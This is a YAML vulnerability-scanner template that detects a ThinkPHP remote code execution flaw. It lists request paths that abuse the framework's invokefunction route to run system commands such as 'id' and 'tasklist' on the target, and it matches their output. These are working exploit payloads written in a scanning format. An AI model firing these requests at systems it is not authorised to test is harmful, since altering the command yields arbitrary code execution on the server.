id: think-php-rce
info:
  name: ThinkPHP RCE
  risk: Critical

params:
  - root: "{{.BaseURL}}"

variables:
  - endpoint: |
      /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
      /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tasklist
      /public/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=tasklist
      /public/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
      /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91
requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.endpoint}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", 'Mem Usage') && StringSearch("response", 'PID')
      - >-
        StatusCode() == 200 && StringSearch("response", 'uid=') && StringSearch("response", 'gid=')
      - >-
        StringSearch("response", 'a29hbHIgaXMg%d2F0Y2hpbmcgeW9129')

references:
  - https://securitynews.sonicwall.com/xmlpost/thinkphp-remote-code-execution-rce-bug-is-actively-being-exploited/